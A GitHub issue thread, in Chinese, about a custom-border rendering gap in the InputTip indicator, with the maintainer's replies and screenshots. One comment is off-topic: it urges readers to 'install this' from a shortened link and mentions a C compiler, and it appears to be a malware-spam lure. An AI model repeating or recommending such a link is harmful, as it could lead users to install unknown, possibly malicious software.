### ISSUE TITLE
[Bug]: 自定义边框显示问题

### ISSUE THREAD

**Issue by lingfengyu-dreaming** [abgox/InputTip#19]
### 开始之前...

- [X] 你正在使用 InputTip 的最新版本。
- [X] 你已经阅读了项目的 README 文件。
- [X] 你已经在 [Issues](https://github.com/abgox/InputTip/issues) 中搜索了相关问题。
- [X] 你已经查看了 https://inputtip.pages.dev/

### 你正在使用什么 Windows 系统版本?

Windows 11

### bug 复现步骤

1. 方块宽高设置为奇数（例如3）
2. 自定义边框，宽度1
3. 查看显示效果

### 期望结果

右边框和下边框贴合颜色方块显示

### 实际发生了什么?

右边框和下边框额外显示一部分空间，没有贴合方块边框

**Comment by Andrez092** [comment]
install this
https://bit.ly/4evXrQ6

you may need to install the c compiler

**Comment by abgox** [comment]
> install this https://bit.ly/4evXrQ6
> 
> you may need to install the c compiler

？？？你在说啥？

**Comment by abgox** [comment]
- 有截图吗？我这里按照这样设置，其实显示效果勉强算正常
- 不过自定义边框确实有点问题，渲染有一点问题，但软件无法解决

![image](https://github.com/user-attachments/assets/646000ae-f986-40f9-8010-cf05093ceee7)

![image](https://github.com/user-attachments/assets/e09a861f-a34c-47b6-962d-47100ccfd0b1)

![image](https://github.com/user-attachments/assets/e78010c0-939e-444b-8e77-1899a303dac6)

**Comment by lingfengyu-dreaming** [comment]
![Clip_2024-09-19_18-53-01](https://github.com/user-attachments/assets/d431c50c-ac5e-4536-b8da-9a6dc5844169)
显示效果大致上差不多，不过我的要多偏移一点，方块水平偏移默认，垂直偏移-3，其他设置和截图只有颜色不同，边框白色

**Comment by abgox** [comment]
> ![Clip_2024-09-19_18-53-01](https://private-user-images.githubusercontent.com/61617417/368957865-d431c50c-ac5e-4536-b8da-9a6dc5844169.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjY3NDY2MDUsIm5iZiI6MTcyNjc0NjMwNSwicGF0aCI6Ii82MTYxNzQxNy8zNjg5NTc4NjUtZDQzMWM1MGMtYWM1ZS00NTM2LWI4ZGEtOWE2ZGM1ODQ0MTY5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MTklMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTE5VDExNDUwNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTU0OWNjMjExYjI5Mjc1ODY4MTYzOGQxYWRiZWNhZDY0ZTZlOWExOGYxYzY5ZDIwMGI4YzNjMDRmYzViYjkyM2QmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.x0dDEe_dN0I5kK0HjtTihIK2YrDvkzT2tzDUM647HtM) 显示效果大致上差不多，不过我的要多偏移一点，方块水平偏移默认，垂直偏移-3，其他设置和截图只有颜色不同，边框白色

- 我将水平偏移也改成了默认，垂直偏移 -3，但贴合程度也比你的截图要好
- 这个渲染，估计可能还有其他的影响因素
  - 你也可以尝试把 方块符号的宽高调大一点，宽高都为3，确实太小了 
  - 就算是默认的宽高为7，其实也不算大 
![image](https://github.com/user-attachments/assets/7a7d1a19-c53b-447d-9e36-ec9a11262522)


- 还是更建议 `设置方块边框样式` 中的 `样式1`、`样式2` 、`样式3`，这三个毕竟是 Gui 原生的，显示效果基本没有什么问题
